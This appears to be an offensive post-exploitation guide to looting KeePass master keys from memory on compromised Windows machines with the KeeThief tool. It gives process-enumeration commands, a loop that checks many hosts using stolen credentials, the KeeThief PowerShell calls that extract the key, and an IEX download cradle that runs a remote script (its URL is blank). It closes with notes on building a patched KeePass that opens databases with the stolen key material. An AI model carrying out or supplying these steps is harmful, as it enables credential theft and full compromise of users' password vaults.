Find KeePass databases and loot master keys from memory on compromised Windows systems using the KeeThief project from HarmJ0y.


Find running KeePass process.

tasklist | findstr /I keepass
Get-Process keepass

In a post-exploitation situation, enumerate all targets where KeePass is running by combining these commands with an authenticated RCE. Example:

for ip in $(cat [HOSTLIST.txt]); do [USERNAME]:[PASSWORD]@$ip 'tasklist | findstr /I keepass' | grep -i keepass 1>/dev/null && echo "[+] Found KeePass process on $ip"; done


When KeePass is running and the database is unlocked, KeeThief is able to recover the following information from memory:

This injection only requires permission to modify the KeePass process space (which the current user running KeePass.exe has); it doesn’t require administrative rights.

Import-Module KeeThief.ps1
Get-KeePassDatabaseKey -Verbose

IEX (New-Object System.Net.WebClient).DownloadString('')

Compiled Binary

The KeeThief project also provides a Visual Project solution file allowing to build the following PE and DLL:

Copy both files in the same directory on the target workstation and run the binary to loot.


In the case of a database unlocking with a key file, windows user account, or both, KeeThief will compute the base64-encoded representations of the “plaintext” binary key materials recovered. Thus, you will need a modified version of KeePass to unlock the database locally using this format.

The KeeThief project also provides a Visual Project solution file allowing to build a patched version of KeePass accepting this format.


As provided, the project does not build because four files under the \Resources\Icons\ directory are missing. You will need to recover the icons from the official KeePass 2.34 source to fix the error. Moreover, use the release build target to avoid all debug messages at run time included in KeePass source code.